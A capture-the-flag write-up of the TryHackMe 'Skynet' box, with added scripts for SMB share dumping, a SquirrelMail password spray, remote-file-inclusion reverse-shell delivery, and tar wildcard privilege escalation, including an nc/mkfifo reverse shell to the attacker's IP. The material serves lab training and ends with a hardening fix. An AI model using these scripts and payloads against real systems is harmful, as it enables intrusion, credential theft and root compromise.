OSCP Prep – THM – Skynet
Since HackTheBox had problems yesterday I did an OSCP-like box from TryHackMe instead. This is a Linux box with a pretty straightforward approach. The initial scan showed a handful of open ports: SMB, HTTP, POP3 and IMAP. Enumerating each of these will give you initial access, and root eventually.
Enumeration
I start with an Nmap scan. From the Nmap scan I see that SMB, IMAP, POP3 and HTTP are some interesting open ports, so we will enumerate them in a bit. Note that a default scan only covers the top 1000 TCP ports ("Not shown: 994 closed ports"); a full -p- sweep is worth running in the background in case something listens higher up.
root@ip-10-10-253-253:~/ctf# nmap -sC -sV 10.10.73.85 -oN nmap.result
Starting Nmap 7.60 ( https://nmap.org ) at 2022-01-11 11:21 GMT
Nmap scan report for ip-10-10-73-85.eu-west-1.compute.internal (10.10.73.85)
Host is up (0.00060s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE CAPA SASL TOP PIPELINING UIDL
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: listed ID more OK SASL-IR LITERAL+ have IDLE IMAP4rev1 post-login Pre-login capabilities LOGINDISABLEDA0001 LOGIN-REFERRALS ENABLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:55:B6:AE:BF:BF (Unknown)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2022-01-11T05:21:32-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-01-11 11:21:32
|_ start_date: 1600-12-31 23:58:45
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.33 seconds
I like to start enumerating SMB first to see if I find anything interesting.
Enumerating SMB
Taking a look at which shares are available we find some interesting ones. Since anonymous access is allowed we can list the shares and possibly access some of them.
root@ip-10-10-253-253:~/ctf# smbclient -L //10.10.73.85
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
The two interesting shares here are anonymous and milesdyson. In the anonymous share we find a note saying that there has been a system malfunction and all Skynet employees must change their password.
root@ip-10-10-253-253:~/ctf# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
Digging further in the share, there is a directory called logs. It holds a few log files, all of them empty except one. log1.txt looks like a list of passwords, which we save for later.
root@ip-10-10-253-253:~/ctf# cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
The other share, milesdyson, we have no access to with a null session. One of the questions in the task is what Miles Dyson's password is.
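Scripted form of the share enumeration above, added here as an example and not taken from the writeup: it parses the smbclient -L listing for Disk shares, tests a null session against each one and downloads any share that is readable anonymously. The loot directory name and the TARGET environment variable are my choices; smbclient (Samba tools) must be on the path.

```shell
#!/bin/sh
# Added example: enumerate SMB shares with a null session and dump the readable
# ones. Not part of the original writeup. Requires smbclient (Samba tools).

# Parse "smbclient -L" output on stdin: keep Disk shares, drop the printer
# driver share. IPC$ is dropped automatically because its type is IPC.
disk_shares() {
    awk '$2 == "Disk" && $1 != "print$" { print $1 }'
}

# Try a null session (-N) against a share; succeeds if a plain "ls" works.
share_readable() {
    host="$1"; share="$2"
    smbclient -N "//$host/$share" -c 'ls' >/dev/null 2>&1
}

# Recursively download a share into outdir/<share> (recurse + no prompting
# lets "mget *" walk subdirectories such as logs/ without questions).
dump_share() {
    host="$1"; share="$2"; outdir="$3"
    mkdir -p "$outdir/$share"
    ( cd "$outdir/$share" && \
      smbclient -N "//$host/$share" -c 'recurse ON; prompt OFF; mget *' )
}

# List shares, report which ones a null session can read, and pull those down.
enum_smb() {
    host="$1"; outdir="${2:-loot}"
    smbclient -N -L "//$host" 2>/dev/null | disk_shares | while IFS= read -r share; do
        if share_readable "$host" "$share"; then
            echo "[+] $share: readable anonymously, dumping to $outdir/$share"
            dump_share "$host" "$share" "$outdir"
        else
            echo "[-] $share: access denied for null session"
        fi
    done
}

# Usage: TARGET=10.10.73.85 sh smb_enum.sh
if [ -n "${TARGET:-}" ]; then
    enum_smb "$TARGET" loot
fi
```

Run against this box it should report anonymous as readable and milesdyson as denied, which is exactly the split described above; the milesdyson share needs the credentials found later, passed with -U milesdyson instead of -N.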
Enumerating HTTP
Looking at the web server we are presented with Skynet's search engine. I didn't find anything interesting here, so I started up gobuster and did a directory brute force using the common.txt wordlist.
root@ip-10-10-253-253:~/ctf# gobuster dir -u http://10.10.73.85 -w /usr/share/wordlists/dirb/common.txt
===============================================================
2022/01/11 11:41:40 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
===============================================================
2022/01/11 11:41:40 Finished
===============================================================
The one that stands out here is squirrelmail. We had no access to the other directories.
From earlier enumeration we have a username for Miles Dyson, milesdyson, and a list of passwords from log1.txt we could try.
So, spinning up Burp Suite, we intercept the login request, send it to Intruder and try to brute-force our way in. In the picture below I've added the position where Intruder will insert our password list.
Right off the bat we can see that cyborg007haloterminator has a different response length than the other passwords and an HTTP status code of 302 (redirect), a strong hint that this is the correct password.
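The same spray as the Burp Intruder run above, scripted with curl so it can be repeated and the odd response picked out automatically (an added example, not code from the original post). It assumes the stock SquirrelMail login form, which posts login_username and secretkey to src/redirect.php; check that against the intercepted request before relying on it. The wordlist is deduplicated first because log1.txt lists cyborg007haloterminator twice, and a duplicate would otherwise turn the single hit into a class of two and hide it from a "minority response" check.

```shell
#!/bin/sh
# Added example: replay the Intruder password spray from the shell and flag
# the response that differs from the rest. Not part of the original writeup.
# Assumption: stock SquirrelMail login form (login_username / secretkey posted
# to src/redirect.php). Verify against the request captured in Burp.

# Try every distinct line of the wordlist once; emit "status size password".
spray_squirrelmail() {
    base="$1"; user="$2"; wordlist="$3"
    sort -u "$wordlist" | while IFS= read -r pw; do
        [ -n "$pw" ] || continue
        res=$(curl -s -o /dev/null -w '%{http_code} %{size_download}' \
            --data-urlencode "login_username=$user" \
            --data-urlencode "secretkey=$pw" \
            --data-urlencode "js_autodetect_results=1" \
            --data-urlencode "just_logged_in=1" \
            "$base/squirrelmail/src/redirect.php")
        printf '%s %s\n' "$res" "$pw"
    done
}

# Group results by (status, size) and print the passwords in any minority
# class. Failed logins all look alike, so the response that is in the
# minority is the candidate, whatever its exact status code turns out to be.
# Reads "status size password" lines on stdin.
find_outliers() {
    awk '{ key = $1 " " $2; n[key]++; k[NR] = key; pw[NR] = $3 }
         END { for (i = 1; i <= NR; i++) if (n[k[i]] * 2 < NR) print pw[i] }'
}

# Usage: TARGET=http://10.10.73.85 sh spray.sh log1.txt
if [ -n "${TARGET:-}" ]; then
    spray_squirrelmail "$TARGET" milesdyson "${1:-log1.txt}" | tee spray.log | find_outliers
fi
```

spray.log keeps the raw status and size per password, so if the minority check is ambiguous (for instance a lockout page appearing halfway through) you can eyeball it the same way you would the Intruder results table.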
SquirrelMail
Logging into Miles Dyson's inbox we find his SMB password, so we can now see what is in his personal SMB share, milesdyson.
Inside his share there are a lot of files, but one of them is named important.txt.
root@ip-10-10-253-253:~/ctf# cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
Hidden Directory
There is a hidden directory on the web server named /45kra24zxs28v3yd.
Running gobuster against this hidden directory we find another subdirectory named administrator.
root@ip-10-10-253-253:~/ctf# gobuster dir -u http://10.10.73.85/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
2022/01/11 11:58:11 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/index.html (Status: 200)
===============================================================
2022/01/11 11:58:12 Finished
A quick Google search for the CMS behind /administrator (Cuppa CMS, going by the Exploit-DB path quoted below) reveals a Remote File Inclusion vulnerability, making it possible for us to get a reverse shell.
From Exploit-db:
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
Using gobuster against /administrator/ confirms that the alerts directory named in the advisory exists.
root@ip-10-10-253-253:~/ctf# gobuster dir -u http://10.10.73.85/45kra24zxs28v3yd/administrator/ -w /usr/share/wordlists/dirb/common.txt -x php
===============================================================
2022/01/11 12:01:21 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.hta (Status: 403)
/.hta.php (Status: 403)
/alerts (Status: 301)
/classes (Status: 301)
/components (Status: 301)
/index.php (Status: 200)
/index.php (Status: 200)
/js (Status: 301)
/media (Status: 301)
/templates (Status: 301)
===============================================================
2022/01/11 12:01:22 Finished
A quick PoC:
Initial access
Having confirmed LFI, we can try RFI. Including a remote URL only works if PHP's allow_url_include is enabled on the target, so it has to be tested rather than assumed.
The steps are as follows:
- Edit the PHP reverse shell script and add our local IP and port.
- Start a simple HTTP server.
- Start a netcat listener.
- Visit http://10.10.73.85/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.253.253:9000/php-reverse-shell.php
- And we have a connection on our listener.
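The LFI check and the RFI delivery steps above as one script (an added example, not the author's code). It assumes php-reverse-shell.php is pentestmonkey's script with its `$ip = '...';` and `$port = ...;` lines, that the LFI check can read /etc/passwd through a ../ traversal in urlConfig, and a listener port of 4444; the HTTP server port 9000, the attacker IP and the CMS path come from the writeup. The LHOST environment variable is my addition.

```shell
#!/bin/sh
# Added example: the LFI check and RFI delivery described above, scripted.
# Not part of the original writeup.
# Assumptions: the ../ traversal used for the LFI check, listener port 4444,
# and that php-reverse-shell.php is pentestmonkey's script with the lines
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS
CMS="${CMS:-/45kra24zxs28v3yd/administrator}"

# Build the vulnerable URL with an arbitrary urlConfig value.
rfi_url() {  # base include
    printf '%s%s/alerts/alertConfigField.php?urlConfig=%s\n' "$1" "$CMS" "$2"
}

# Confirm local file inclusion: a readable /etc/passwd shows up in the body.
check_lfi() {  # base
    curl -s "$(rfi_url "$1" '../../../../../../etc/passwd')" | grep -q '^root:x:0:0:'
}

# Point the reverse shell at our listener; returns non-zero if either line
# was not rewritten (wrong file, or not the pentestmonkey script).
patch_reverse_shell() {  # file ip port
    tmp=$(mktemp)
    sed -e "s/^[\$]ip = '[^']*';/\$ip = '$2';/" \
        -e "s/^[\$]port = [0-9]*;/\$port = $3;/" "$1" > "$tmp" && mv "$tmp" "$1"
    [ "$(grep -c -e "^[\$]ip = '$2';" -e "^[\$]port = $3;" "$1")" -eq 2 ]
}

# Serve the shell over HTTP, open the listener, and trigger the include.
# The trigger runs in the background after a short delay so nc can take the
# foreground; when you exit the shell, the HTTP server is cleaned up.
deliver_rfi() {  # target_base attacker_ip http_port nc_port
    patch_reverse_shell php-reverse-shell.php "$2" "$4" || return 1
    python3 -m http.server "$3" >/dev/null 2>&1 &
    httpd=$!
    ( sleep 2; curl -s "$(rfi_url "$1" "http://$2:$3/php-reverse-shell.php")" >/dev/null ) &
    nc -lvnp "$4"
    kill "$httpd"
}

# Usage: TARGET=http://10.10.73.85 LHOST=10.10.253.253 sh rfi.sh
if [ -n "${TARGET:-}" ]; then
    if check_lfi "$TARGET"; then echo "[+] LFI confirmed"; else echo "[-] no LFI, check the path"; fi
    deliver_rfi "$TARGET" "${LHOST:?set LHOST to your tun0 address}" 9000 4444
fi
```

If the LFI check passes but nothing hits the listener, watch the HTTP server's log: no request for php-reverse-shell.php means the target never fetched the URL, which is what allow_url_include=Off looks like from the outside.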
After stabilizing our shell, we can look for user.txt.
Root
In Miles Dyson's home directory there is a directory called backups containing two files, backup.sh and backup.tgz. Both are owned by root.
www-data@skynet:/home/milesdyson/backups$ ls -l
total 4
-rwxr-xr-x 1 root root 74 Sep 17 2019 backup.sh
-rw-r--r-- 1 root root 0 Jan 11 06:29 backup.tgz
www-data@skynet:/home/milesdyson/backups$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
Looking at the system crontab we see that backup.sh is executed every minute as root.
www-data@skynet:/home/milesdyson/backups$ cat /etc/crontab
*/1 * * * * root /home/milesdyson/backups/backup.sh
Since tar is run by root with a shell wildcard (*), every filename in /var/www/html is expanded onto tar's command line, and a filename that starts with -- is parsed as an option rather than a file. We have write access to /var/www/html as www-data, so we can plant a script there plus two specially named files that make tar execute it, following the technique from GTFOBins.
www-data@skynet:/var/www/html$ echo "mkfifo /tmp/fmbw; nc 10.10.253.253 8888 0</tmp/fmbw | /bin/sh >/tmp/fmbw 2>&1; rm /tmp/fmbw" > shell.sh
www-data@skynet:/var/www/html$ echo "" > "--checkpoint-action=exec=sh shell.sh"
www-data@skynet:/var/www/html$ echo "" > --checkpoint=1
From the tar man page:
--checkpoint-action=ACTION   Execute ACTION at every checkpoint. ACTION may be one of the following:
--checkpoint[=NUMBER]        Use "checkpoints": display a progress message every NUMBER records (default 10).
Starting our netcat listener on port 8888, we wait for cron to run the script and hand us a root shell.
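To see exactly why the cron job is exploitable, here is the wildcard injection reproduced against a scratch directory (an added example, not from the writeup): the planted filenames are the ones used above, the payload only drops a marker file instead of calling back, and a second run shows the fix of putting -- before the glob so tar stops treating filenames as options. It needs GNU tar, which is what Ubuntu ships.

```shell
#!/bin/sh
# Added example: reproduce the tar wildcard injection locally, against a
# throwaway directory instead of /var/www/html, and show the fix.
# Not part of the original writeup; needs GNU tar.
# The "shell" here only drops a marker file, standing in for the nc payload.

# mode: vulnerable -> tar cf backup.tgz *      (as in backup.sh)
#       hardened   -> tar cf backup.tgz -- *   (-- ends option parsing)
# Prints "executed" if the planted script ran, "not_executed" otherwise.
demo_tar_wildcard() {
    mode="$1"
    work=$(mktemp -d)
    marker="$work/marker"
    mkdir "$work/html"
    echo '<?php echo "site"; ?>' > "$work/html/index.php"
    # What www-data plants in the directory root is about to back up:
    echo "touch '$marker'" > "$work/html/shell.sh"
    : > "$work/html/--checkpoint=1"
    : > "$work/html/--checkpoint-action=exec=sh shell.sh"
    (
        cd "$work/html" || exit 1
        if [ "$mode" = vulnerable ]; then
            # The glob expands to: --checkpoint-action=exec=sh shell.sh
            # --checkpoint=1 index.php shell.sh, and tar obeys the first two.
            tar cf "$work/backup.tgz" * 2>/dev/null || true
        else
            # Same glob, but everything after -- is a filename to tar.
            tar cf "$work/backup.tgz" -- * 2>/dev/null || true
        fi
    )
    if [ -e "$marker" ]; then echo executed; else echo not_executed; fi
    rm -rf "$work"
}

echo "vulnerable: $(demo_tar_wildcard vulnerable)"
echo "hardened:   $(demo_tar_wildcard hardened)"
```

The same effect is had by `tar cf backup.tgz -C /var/www/html .`, which archives ./-prefixed names and never sees a bare leading dash. The deeper problem on this box is a root cron job reading from a directory that www-data can write to; the -- only closes this one avenue.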